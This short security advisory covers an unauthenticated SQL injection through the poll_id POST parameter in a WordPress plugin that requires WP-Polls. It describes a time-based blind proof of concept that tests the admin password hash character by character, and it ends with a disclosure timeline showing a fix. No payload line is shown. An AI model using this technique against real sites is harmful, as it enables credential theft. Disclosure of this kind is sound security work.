For this vulnerabilities also WP-Polls needs to be installed.
Everyone can access
$_POST["poll_id"] is not escaped properly because
mysql_real_escape_string() only escapes \x00, \n, \r, \, ‘, “ and \x1a.
So we can put SQL Injection inside
$poll_id is not escaped.
Proof of Concept:
This SQL will check if first password character user ID=1 is “$”.
If yes, it will sleep 5 seconds.
- 07-04-2015: Discovered
- 07-04-2015: Vendor notified
- 12-04-2015: Version 0.8.4.9 released, issue resolved